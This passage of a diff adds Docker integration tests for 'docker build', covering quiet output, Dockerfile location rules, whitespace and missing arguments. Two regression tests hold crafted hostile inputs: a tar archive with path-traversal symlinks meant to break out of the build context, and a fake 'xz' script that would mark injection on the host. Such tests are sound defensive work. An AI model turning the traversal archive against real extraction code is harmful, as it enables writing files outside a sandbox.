+       LABEL f1=b1 f2=b2`, false)
+	if err != nil {
+		c.Fatalf("Build 5 should have worked: %q", err)
+	}
+
+	id2, err = buildImage(name,
+		`FROM busybox
+       LABEL f1="b1 f2=b2"`, true)
+	if err != nil || id1 == id2 {
+		c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s): %q", id1, id2, err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildNotVerboseSuccess(c *check.C) {
+	// This test makes sure that -q works correctly when build is successful:
+	// stdout has only the image ID (long image ID) and stderr is empty.
+	var stdout, stderr string
+	var err error
+	outRegexp := regexp.MustCompile("^(sha256:|)[a-z0-9]{64}\\n$")
+
+	tt := []struct {
+		Name      string
+		BuildFunc func(string)
+	}{
+		{
+			Name: "quiet_build_stdin_success",
+			BuildFunc: func(name string) {
+				_, stdout, stderr, err = buildImageWithStdoutStderr(name, "FROM busybox", true, "-q", "--force-rm", "--rm")
+			},
+		},
+		{
+			Name: "quiet_build_ctx_success",
+			BuildFunc: func(name string) {
+				ctx, err := fakeContext("FROM busybox", map[string]string{
+					"quiet_build_success_fctx": "test",
+				})
+				if err != nil {
+					c.Fatalf("Failed to create context: %s", err.Error())
+				}
+				defer ctx.Close()
+				_, stdout, stderr, err = buildImageFromContextWithStdoutStderr(name, ctx, true, "-q", "--force-rm", "--rm")
+			},
+		},
+		{
+			Name: "quiet_build_git_success",
+			BuildFunc: func(name string) {
+				git, err := newFakeGit("repo", map[string]string{
+					"Dockerfile": "FROM busybox",
+				}, true)
+				if err != nil {
+					c.Fatalf("Failed to create the git repo: %s", err.Error())
+				}
+				defer git.Close()
+				_, stdout, stderr, err = buildImageFromGitWithStdoutStderr(name, git, true, "-q", "--force-rm", "--rm")
+
+			},
+		},
+	}
+
+	for _, te := range tt {
+		te.BuildFunc(te.Name)
+		if err != nil {
+			c.Fatalf("Test %s shouldn't fail, but got the following error: %s", te.Name, err.Error())
+		}
+		if outRegexp.Find([]byte(stdout)) == nil {
+			c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, stdout)
+		}
+
+		if stderr != "" {
+			c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, stderr)
+		}
+	}
+
+}
+
+func (s *DockerSuite) TestBuildNotVerboseFailureWithNonExistImage(c *check.C) {
+	// This test makes sure that -q works correctly when build fails by
+	// comparing between the stderr output in quiet mode and in stdout
+	// and stderr output in verbose mode
+	testRequires(c, Network)
+	testName := "quiet_build_not_exists_image"
+	buildCmd := "FROM busybox11"
+	_, _, qstderr, qerr := buildImageWithStdoutStderr(testName, buildCmd, false, "-q", "--force-rm", "--rm")
+	_, vstdout, vstderr, verr := buildImageWithStdoutStderr(testName, buildCmd, false, "--force-rm", "--rm")
+	if verr == nil || qerr == nil {
+		c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", testName))
+	}
+	if qstderr != vstdout+vstderr {
+		c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, qstderr, vstdout+vstderr))
+	}
+}
+
+func (s *DockerSuite) TestBuildNotVerboseFailure(c *check.C) {
+	// This test makes sure that -q works correctly when build fails by
+	// comparing between the stderr output in quiet mode and in stdout
+	// and stderr output in verbose mode
+	tt := []struct {
+		TestName  string
+		BuildCmds string
+	}{
+		{"quiet_build_no_from_at_the_beginning", "RUN whoami"},
+		{"quiet_build_unknown_instr", "FROMD busybox"},
+	}
+
+	for _, te := range tt {
+		_, _, qstderr, qerr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "-q", "--force-rm", "--rm")
+		_, vstdout, vstderr, verr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "--force-rm", "--rm")
+		if verr == nil || qerr == nil {
+			c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", te.TestName))
+		}
+		if qstderr != vstdout+vstderr {
+			c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", te.TestName, qstderr, vstdout+vstderr))
+		}
+	}
+}
+
+func (s *DockerSuite) TestBuildNotVerboseFailureRemote(c *check.C) {
+	// This test ensures that when given a wrong URL, stderr in quiet mode and
+	// stderr in verbose mode are identical.
+	// TODO(vdemeester) with cobra, stdout has a carriage return too much so this test should not check stdout
+	URL := "http://something.invalid"
+	Name := "quiet_build_wrong_remote"
+	_, _, qstderr, qerr := buildImageWithStdoutStderr(Name, "", false, "-q", "--force-rm", "--rm", URL)
+	_, _, vstderr, verr := buildImageWithStdoutStderr(Name, "", false, "--force-rm", "--rm", URL)
+	if qerr == nil || verr == nil {
+		c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", Name))
+	}
+	if qstderr != vstderr {
+		c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", Name, qstderr, vstderr))
+	}
+}
+
+func (s *DockerSuite) TestBuildStderr(c *check.C) {
+	// This test just makes sure that no non-error output goes
+	// to stderr
+	name := "testbuildstderr"
+	_, _, stderr, err := buildImageWithStdoutStderr(name,
+		"FROM busybox\nRUN echo one", true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if runtime.GOOS == "windows" &&
+		daemonPlatform != "windows" {
+		// Windows to non-Windows should have a security warning
+		if !strings.Contains(stderr, "SECURITY WARNING:") {
+			c.Fatalf("Stderr contains unexpected output: %q", stderr)
+		}
+	} else {
+		// Other platform combinations should have no stderr written too
+		if stderr != "" {
+			c.Fatalf("Stderr should have been empty, instead it's: %q", stderr)
+		}
+	}
+}
+
+func (s *DockerSuite) TestBuildChownSingleFile(c *check.C) {
+	testRequires(c, UnixCli) // test uses chown: not available on windows
+	testRequires(c, DaemonIsLinux)
+
+	name := "testbuildchownsinglefile"
+
+	ctx, err := fakeContext(`
+FROM busybox
+COPY test /
+RUN ls -l /test
+RUN [ $(ls -l /test | awk '{print $3":"$4}') = 'root:root' ]
+`, map[string]string{
+		"test": "test",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if err := os.Chown(filepath.Join(ctx.Dir, "test"), 4242, 4242); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) {
+	name := "testbuildsymlinkbreakout"
+	tmpdir, err := ioutil.TempDir("", name)
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(tmpdir)
+	ctx := filepath.Join(tmpdir, "context")
+	if err := os.MkdirAll(ctx, 0755); err != nil {
+		c.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte(`
+	from busybox
+	add symlink.tar /
+	add inject /symlink/
+	`), 0644); err != nil {
+		c.Fatal(err)
+	}
+	inject := filepath.Join(ctx, "inject")
+	if err := ioutil.WriteFile(inject, nil, 0644); err != nil {
+		c.Fatal(err)
+	}
+	f, err := os.Create(filepath.Join(ctx, "symlink.tar"))
+	if err != nil {
+		c.Fatal(err)
+	}
+	w := tar.NewWriter(f)
+	w.WriteHeader(&tar.Header{
+		Name:     "symlink2",
+		Typeflag: tar.TypeSymlink,
+		Linkname: "/../../../../../../../../../../../../../../",
+		Uid:      os.Getuid(),
+		Gid:      os.Getgid(),
+	})
+	w.WriteHeader(&tar.Header{
+		Name:     "symlink",
+		Typeflag: tar.TypeSymlink,
+		Linkname: filepath.Join("symlink2", tmpdir),
+		Uid:      os.Getuid(),
+		Gid:      os.Getgid(),
+	})
+	w.Close()
+	f.Close()
+	if _, err := buildImageFromContext(name, fakeContextFromDir(ctx), false); err != nil {
+		c.Fatal(err)
+	}
+	if _, err := os.Lstat(filepath.Join(tmpdir, "inject")); err == nil {
+		c.Fatal("symlink breakout - inject")
+	} else if !os.IsNotExist(err) {
+		c.Fatalf("unexpected error: %v", err)
+	}
+}
+
+func (s *DockerSuite) TestBuildXZHost(c *check.C) {
+	// /usr/local/sbin/xz gets permission denied for the user
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildxzhost"
+
+	ctx, err := fakeContext(`
+FROM busybox
+ADD xz /usr/local/sbin/
+RUN chmod 755 /usr/local/sbin/xz
+ADD test.xz /
+RUN [ ! -e /injected ]`,
+		map[string]string{
+			"test.xz": "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00" +
+				"\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd" +
+				"\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21",
+			"xz": "#!/bin/sh\ntouch /injected",
+		})
+
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatal(err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) {
+	// /foo/file gets permission denied for the user
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux) // TODO Windows: Issue #20127
+	var (
+		name     = "testbuildvolumescontent"
+		expected = "some text"
+		volName  = "/foo"
+	)
+
+	if daemonPlatform == "windows" {
+		volName = "C:/foo"
+	}
+
+	ctx, err := fakeContext(`
+FROM busybox
+COPY content /foo/file
+VOLUME `+volName+`
+CMD cat /foo/file`,
+		map[string]string{
+			"content": expected,
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, false); err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "run", "--rm", name)
+	if out != expected {
+		c.Fatalf("expected file contents for /foo/file to be %q but received %q", expected, out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildRenamedDockerfile(c *check.C) {
+
+	ctx, err := fakeContext(`FROM busybox
+	RUN echo from Dockerfile`,
+		map[string]string{
+			"Dockerfile":       "FROM busybox\nRUN echo from Dockerfile",
+			"files/Dockerfile": "FROM busybox\nRUN echo from files/Dockerfile",
+			"files/dFile":      "FROM busybox\nRUN echo from files/dFile",
+			"dFile":            "FROM busybox\nRUN echo from dFile",
+			"files/dFile2":     "FROM busybox\nRUN echo from files/dFile2",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".")
+	if err != nil {
+		c.Fatalf("Failed to build: %s\n%s", out, err)
+	}
+	if !strings.Contains(out, "from Dockerfile") {
+		c.Fatalf("test1 should have used Dockerfile, output:%s", out)
+	}
+
+	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-f", filepath.Join("files", "Dockerfile"), "-t", "test2", ".")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !strings.Contains(out, "from files/Dockerfile") {
+		c.Fatalf("test2 should have used files/Dockerfile, output:%s", out)
+	}
+
+	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", filepath.Join("files", "dFile")), "-t", "test3", ".")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !strings.Contains(out, "from files/dFile") {
+		c.Fatalf("test3 should have used files/dFile, output:%s", out)
+	}
+
+	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--file=dFile", "-t", "test4", ".")
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !strings.Contains(out, "from dFile") {
+		c.Fatalf("test4 should have used dFile, output:%s", out)
+	}
+
+	dirWithNoDockerfile, err := ioutil.TempDir(os.TempDir(), "test5")
+	c.Assert(err, check.IsNil)
+	nonDockerfileFile := filepath.Join(dirWithNoDockerfile, "notDockerfile")
+	if _, err = os.Create(nonDockerfileFile); err != nil {
+		c.Fatal(err)
+	}
+	out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", nonDockerfileFile), "-t", "test5", ".")
+
+	if err == nil {
+		c.Fatalf("test5 was supposed to fail to find passwd")
+	}
+
+	if expected := fmt.Sprintf("The Dockerfile (%s) must be within the build context (.)", nonDockerfileFile); !strings.Contains(out, expected) {
+		c.Fatalf("wrong error message:%v\nexpected to contain=%v", out, expected)
+	}
+
+	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test6", "..")
+	if err != nil {
+		c.Fatalf("test6 failed: %s", err)
+	}
+	if !strings.Contains(out, "from Dockerfile") {
+		c.Fatalf("test6 should have used root Dockerfile, output:%s", out)
+	}
+
+	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join(ctx.Dir, "files", "Dockerfile"), "-t", "test7", "..")
+	if err != nil {
+		c.Fatalf("test7 failed: %s", err)
+	}
+	if !strings.Contains(out, "from files/Dockerfile") {
+		c.Fatalf("test7 should have used files Dockerfile, output:%s", out)
+	}
+
+	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test8", ".")
+	if err == nil || !strings.Contains(out, "must be within the build context") {
+		c.Fatalf("test8 should have failed with Dockerfile out of context: %s", err)
+	}
+
+	tmpDir := os.TempDir()
+	out, _, err = dockerCmdInDir(c, tmpDir, "build", "-t", "test9", ctx.Dir)
+	if err != nil {
+		c.Fatalf("test9 - failed: %s", err)
+	}
+	if !strings.Contains(out, "from Dockerfile") {
+		c.Fatalf("test9 should have used root Dockerfile, output:%s", out)
+	}
+
+	out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", "dFile2", "-t", "test10", ".")
+	if err != nil {
+		c.Fatalf("test10 should have worked: %s", err)
+	}
+	if !strings.Contains(out, "from files/dFile2") {
+		c.Fatalf("test10 should have used files/dFile2, output:%s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildFromMixedcaseDockerfile(c *check.C) {
+	testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows
+	testRequires(c, DaemonIsLinux)
+
+	ctx, err := fakeContext(`FROM busybox
+	RUN echo from dockerfile`,
+		map[string]string{
+			"dockerfile": "FROM busybox\nRUN echo from dockerfile",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".")
+	if err != nil {
+		c.Fatalf("Failed to build: %s\n%s", out, err)
+	}
+
+	if !strings.Contains(out, "from dockerfile") {
+		c.Fatalf("Missing proper output: %s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildWithTwoDockerfiles(c *check.C) {
+	testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows
+	testRequires(c, DaemonIsLinux)
+
+	ctx, err := fakeContext(`FROM busybox
+RUN echo from Dockerfile`,
+		map[string]string{
+			"dockerfile": "FROM busybox\nRUN echo from dockerfile",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".")
+	if err != nil {
+		c.Fatalf("Failed to build: %s\n%s", out, err)
+	}
+
+	if !strings.Contains(out, "from Dockerfile") {
+		c.Fatalf("Missing proper output: %s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildFromURLWithF(c *check.C) {
+	server, err := fakeStorage(map[string]string{"baz": `FROM busybox
+RUN echo from baz
+COPY * /tmp/
+RUN find /tmp/`})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer server.Close()
+
+	ctx, err := fakeContext(`FROM busybox
+RUN echo from Dockerfile`,
+		map[string]string{})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	// Make sure that -f is ignored and that we don't use the Dockerfile
+	// that's in the current dir
+	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-f", "baz", "-t", "test1", server.URL()+"/baz")
+	if err != nil {
+		c.Fatalf("Failed to build: %s\n%s", out, err)
+	}
+
+	if !strings.Contains(out, "from baz") ||
+		strings.Contains(out, "/tmp/baz") ||
+		!strings.Contains(out, "/tmp/Dockerfile") {
+		c.Fatalf("Missing proper output: %s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildFromStdinWithF(c *check.C) {
+	testRequires(c, DaemonIsLinux) // TODO Windows: This test is flaky; no idea why
+	ctx, err := fakeContext(`FROM busybox
+RUN echo "from Dockerfile"`,
+		map[string]string{})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	// Make sure that -f is ignored and that we don't use the Dockerfile
+	// that's in the current dir
+	dockerCommand := exec.Command(dockerBinary, "build", "-f", "baz", "-t", "test1", "-")
+	dockerCommand.Dir = ctx.Dir
+	dockerCommand.Stdin = strings.NewReader(`FROM busybox
+RUN echo "from baz"
+COPY * /tmp/
+RUN sh -c "find /tmp/" # sh -c is needed on Windows to use the correct find`)
+	out, status, err := runCommandWithOutput(dockerCommand)
+	if err != nil || status != 0 {
+		c.Fatalf("Error building: %s", err)
+	}
+
+	if !strings.Contains(out, "from baz") ||
+		strings.Contains(out, "/tmp/baz") ||
+		!strings.Contains(out, "/tmp/Dockerfile") {
+		c.Fatalf("Missing proper output: %s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildFromOfficialNames(c *check.C) {
+	name := "testbuildfromofficial"
+	fromNames := []string{
+		"busybox",
+		"docker.io/busybox",
+		"index.docker.io/busybox",
+		"library/busybox",
+		"docker.io/library/busybox",
+		"index.docker.io/library/busybox",
+	}
+	for idx, fromName := range fromNames {
+		imgName := fmt.Sprintf("%s%d", name, idx)
+		_, err := buildImage(imgName, "FROM "+fromName, true)
+		if err != nil {
+			c.Errorf("Build failed using FROM %s: %s", fromName, err)
+		}
+		deleteImages(imgName)
+	}
+}
+
+func (s *DockerSuite) TestBuildDockerfileOutsideContext(c *check.C) {
+	testRequires(c, UnixCli) // uses os.Symlink: not implemented in windows at the time of writing (go-1.4.2)
+	testRequires(c, DaemonIsLinux)
+
+	name := "testbuilddockerfileoutsidecontext"
+	tmpdir, err := ioutil.TempDir("", name)
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(tmpdir)
+	ctx := filepath.Join(tmpdir, "context")
+	if err := os.MkdirAll(ctx, 0755); err != nil {
+		c.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte("FROM scratch\nENV X Y"), 0644); err != nil {
+		c.Fatal(err)
+	}
+	wd, err := os.Getwd()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.Chdir(wd)
+	if err := os.Chdir(ctx); err != nil {
+		c.Fatal(err)
+	}
+	if err := ioutil.WriteFile(filepath.Join(tmpdir, "outsideDockerfile"), []byte("FROM scratch\nENV x y"), 0644); err != nil {
+		c.Fatal(err)
+	}
+	if err := os.Symlink(filepath.Join("..", "outsideDockerfile"), filepath.Join(ctx, "dockerfile1")); err != nil {
+		c.Fatal(err)
+	}
+	if err := os.Symlink(filepath.Join(tmpdir, "outsideDockerfile"), filepath.Join(ctx, "dockerfile2")); err != nil {
+		c.Fatal(err)
+	}
+
+	for _, dockerfilePath := range []string{
+		filepath.Join("..", "outsideDockerfile"),
+		filepath.Join(ctx, "dockerfile1"),
+		filepath.Join(ctx, "dockerfile2"),
+	} {
+		result := dockerCmdWithResult("build", "-t", name, "--no-cache", "-f", dockerfilePath, ".")
+		c.Assert(result, icmd.Matches, icmd.Expected{
+			Err:      "must be within the build context",
+			ExitCode: 1,
+		})
+		deleteImages(name)
+	}
+
+	os.Chdir(tmpdir)
+
+	// Path to Dockerfile should be resolved relative to working directory, not relative to context.
+	// There is a Dockerfile in the context, but since there is no Dockerfile in the current directory, the following should fail
+	out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "Dockerfile", ctx)
+	if err == nil {
+		c.Fatalf("Expected error. Out: %s", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildSpaces(c *check.C) {
+	// Test to make sure that leading/trailing spaces on a command
+	// doesn't change the error msg we get
+	var (
+		err1 error
+		err2 error
+	)
+
+	name := "testspaces"
+	ctx, err := fakeContext("FROM busybox\nCOPY\n",
+		map[string]string{
+			"Dockerfile": "FROM busybox\nCOPY\n",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err1 = buildImageFromContext(name, ctx, false); err1 == nil {
+		c.Fatal("Build 1 was supposed to fail, but didn't")
+	}
+
+	ctx.Add("Dockerfile", "FROM busybox\nCOPY    ")
+	if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil {
+		c.Fatal("Build 2 was supposed to fail, but didn't")
+	}
+
+	removeLogTimestamps := func(s string) string {
+		return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`)
+	}
+
+	// Skip over the times
+	e1 := removeLogTimestamps(err1.Error())
+	e2 := removeLogTimestamps(err2.Error())
+
+	// Ignore whitespace since that's what were verifying doesn't change stuff
+	if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) {
+		c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", err1, err2)
+	}
+
+	ctx.Add("Dockerfile", "FROM busybox\n   COPY")
+	if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil {
+		c.Fatal("Build 3 was supposed to fail, but didn't")
+	}
+
+	// Skip over the times
+	e1 = removeLogTimestamps(err1.Error())
+	e2 = removeLogTimestamps(err2.Error())
+
+	// Ignore whitespace since that's what were verifying doesn't change stuff
+	if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) {
+		c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", err1, err2)
+	}
+
+	ctx.Add("Dockerfile", "FROM busybox\n   COPY    ")
+	if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil {
+		c.Fatal("Build 4 was supposed to fail, but didn't")
+	}
+
+	// Skip over the times
+	e1 = removeLogTimestamps(err1.Error())
+	e2 = removeLogTimestamps(err2.Error())
+
+	// Ignore whitespace since that's what were verifying doesn't change stuff
+	if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) {
+		c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", err1, err2)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildSpacesWithQuotes(c *check.C) {
+	// Test to make sure that spaces in quotes aren't lost
+	name := "testspacesquotes"
+
+	dockerfile := `FROM busybox
+RUN echo "  \
+  foo  "`
+
+	_, out, err := buildImageWithOut(name, dockerfile, false)
+	if err != nil {
+		c.Fatal("Build failed:", err)
+	}
+
+	expecting := "\n    foo  \n"
+	// Windows uses the builtin echo, which preserves quotes
+	if daemonPlatform == "windows" {
+		expecting = "\"    foo  \""
+	}
+	if !strings.Contains(out, expecting) {
+		c.Fatalf("Bad output: %q expecting to contain %q", out, expecting)
+	}
+
+}
+
+// #4393
+func (s *DockerSuite) TestBuildVolumeFileExistsinContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux) // TODO Windows: This should error out
+	buildCmd := exec.Command(dockerBinary, "build", "-t", "docker-test-errcreatevolumewithfile", "-")
+	buildCmd.Stdin = strings.NewReader(`
+	FROM busybox
+	RUN touch /foo
+	VOLUME /foo
+	`)
+
+	out, _, err := runCommandWithOutput(buildCmd)
+	if err == nil || !strings.Contains(out, "file exists") {
+		c.Fatalf("expected build to fail when file exists in container at requested volume path")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildMissingArgs(c *check.C) {
+	// Test to make sure that all Dockerfile commands (except the ones listed
+	// in skipCmds) will generate an error if no args are provided.
+	// Note: INSERT is deprecated so we exclude it because of that.
+	skipCmds := map[string]struct{}{
+		"CMD":        {},
+		"RUN":        {},
+		"ENTRYPOINT": {},
+		"INSERT":     {},
+	}
+
+	if daemonPlatform == "windows" {
+		skipCmds = map[string]struct{}{
+			"CMD":        {},
+			"RUN":        {},
+			"ENTRYPOINT": {},
+			"INSERT":     {},
+			"STOPSIGNAL": {},
+			"ARG":        {},
+			"USER":       {},
+			"EXPOSE":     {},
+		}
+	}
+
+	for cmd := range command.Commands {
+		cmd = strings.ToUpper(cmd)
+		if _, ok := skipCmds[cmd]; ok {
+			continue
+		}
+
+		var dockerfile string
+		if cmd == "FROM" {
+			dockerfile = cmd
+		} else {
+			// Add FROM to make sure we don't complain about it missing
+			dockerfile = "FROM busybox\n" + cmd
+		}
+
+		ctx, err := fakeContext(dockerfile, map[string]string{})
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+		var out string
+		if out, err = buildImageFromContext("args", ctx, true); err == nil {
+			c.Fatalf("%s was supposed to fail. Out:%s", cmd, out)
+		}
+		if !strings.Contains(err.Error(), cmd+" requires") {
+			c.Fatalf("%s returned the wrong type of error:%s", cmd, err)
+		}
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEmptyScratch(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	_, out, err := buildImageWithOut("sc", "FROM scratch", true)
+	if err == nil {
+		c.Fatalf("Build was supposed to fail")
+	}
+	if !strings.Contains(out, "No image was generated") {
+		c.Fatalf("Wrong error message: %v", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildDotDotFile(c *check.C) {
+	ctx, err := fakeContext("FROM busybox\n",
+		map[string]string{
+			"..gitme": "",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err = buildImageFromContext("sc", ctx, false); err != nil {
+		c.Fatalf("Build was supposed to work: %s", err)
+	}
+}
+
+func (s *DockerSuite) TestBuildRUNoneJSON(c *check.C) {
+	testRequires(c, DaemonIsLinux) // No hello-world Windows image
+	name := "testbuildrunonejson"
+
+	ctx, err := fakeContext(`FROM hello-world:frozen
+RUN [ "/hello" ]`, map[string]string{})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "-t", name, ".")
+	if err != nil {
+		c.Fatalf("failed to build the image: %s, %v", out, err)
+	}
+
+	if !strings.Contains(out, "Hello from Docker") {
+		c.Fatalf("bad output: %s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEmptyStringVolume(c *check.C) {
+	name := "testbuildemptystringvolume"
+
+	_, err := buildImage(name, `
+  FROM busybox
+  ENV foo=""
+  VOLUME $foo
+  `, false)
+	if err == nil {
+		c.Fatal("Should have failed to build")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildContainerWithCgroupParent(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	testRequires(c, DaemonIsLinux)
+
+	cgroupParent := "test"
+	data, err := ioutil.ReadFile("/proc/self/cgroup")
+	if err != nil {
+		c.Fatalf("failed to read '/proc/self/cgroup - %v", err)
+	}
+	selfCgroupPaths := parseCgroupPaths(string(data))
+	_, found := selfCgroupPaths["memory"]
+	if !found {
+		c.Fatalf("unable to find self memory cgroup path. CgroupsPath: %v", selfCgroupPaths)
+	}
+	cmd := exec.Command(dockerBinary, "build", "--cgroup-parent", cgroupParent, "-")
+	cmd.Stdin = strings.NewReader(`
+FROM busybox
+RUN cat /proc/self/cgroup
+`)
+
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
+	}
+	m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), out)
+	c.Assert(err, check.IsNil)
+	if !m {
+		c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, out)
+	}
+}
+
+func (s *DockerSuite) TestBuildNoDupOutput(c *check.C) {
+	// Check to make sure our build output prints the Dockerfile cmd
+	// property - there was a bug that caused it to be duplicated on the
+	// Step X  line
+	name := "testbuildnodupoutput"
+
+	_, out, err := buildImageWithOut(name, `
+  FROM busybox
+  RUN env`, false)
+	if err != nil {
+		c.Fatalf("Build should have worked: %q", err)
+	}
+
+	exp := "\nStep 2/2 : RUN env\n"
+	if !strings.Contains(out, exp) {
+		c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp)
+	}
+}
+
+// GH15826
+func (s *DockerSuite) TestBuildStartsFromOne(c *check.C) {
+	// Explicit check to ensure that build starts from step 1 rather than 0
+	name := "testbuildstartsfromone"
+
+	_, out, err := buildImageWithOut(name, `
+  FROM busybox`, false)
+	if err != nil {
+		c.Fatalf("Build should have worked: %q", err)
+	}
+
+	exp := "\nStep 1/1 : FROM busybox\n"
+	if !strings.Contains(out, exp) {
+		c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp)
+	}
+}
+
+func (s *DockerSuite) TestBuildRUNErrMsg(c *check.C) {
+	// Test to make sure the bad command is quoted with just "s and
+	// not as a Go []string
+	name := "testbuildbadrunerrmsg"
+	_, out, err := buildImageWithOut(name, `
+  FROM busybox
+  RUN badEXE a1 \& a2	a3`, false) // tab between a2 and a3
+	if err == nil {
+		c.Fatal("Should have failed to build")
+	}
+	shell := "/bin/sh -c"
+	exitCode := "127"
+	if daemonPlatform == "windows" {
+		shell = "cmd /S /C"
+		// architectural - Windows has to start the container to determine the exe is bad, Linux does not
+		exitCode = "1"
+	}
+	exp := `The command '` + shell + ` badEXE a1 \& a2	a3' returned a non-zero code: ` + exitCode
+	if !strings.Contains(out, exp) {
+		c.Fatalf("RUN doesn't have the correct output:\nGot:%s\nExpected:%s", out, exp)
+	}
+}
+
+func (s *DockerTrustSuite) TestTrustedBuild(c *check.C) {
+	repoName := s.setupTrustedImage(c, "trusted-build")
